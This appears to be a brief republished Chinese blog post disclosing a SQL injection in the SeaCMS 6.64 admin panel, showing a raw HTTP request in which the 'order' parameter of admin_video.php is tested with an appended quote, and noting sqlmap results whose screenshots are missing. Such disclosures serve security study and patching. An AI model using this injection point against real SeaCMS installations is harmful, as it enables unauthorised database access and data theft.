SeaCMS 6.64 sql注入

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SeaCMS 6.64 sql注入相关的知识,希望对你有一定的参考价值。

SeaCMS 6.64 sql注入

请求数据包:
order参数存在sql注入

GET /seacms6.64/upload/admin/admin_video.php?repeat=ok&order=v_name&allrepeat=ok‘ HTTP/1.1
Host: 172.16.173.249
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://172.16.173.203/seacms6.64 ... e.php?action=repeat
Cookie: PHPSESSID=odsoljsk6cvfkvcgm0i03v8np6
Connection: close
Upgrade-Insecure-Requests: 1

sqlmap扫描结果:
技术分享图片

数据库名:
技术分享图片

以上是关于SeaCMS 6.64 sql注入的主要内容,如果未能解决你的问题,请参考以下文章

seacms 6.64 目录遍历

SQL注入分类有哪些,一看你就明白了。SQL注入点/SQL注入类型/SQL注入有几种/SQL注入点分类

sql注入漏洞都有哪些

sql 注入是啥?

什么叫sql注入,如何防止sql注入

关于SQL注入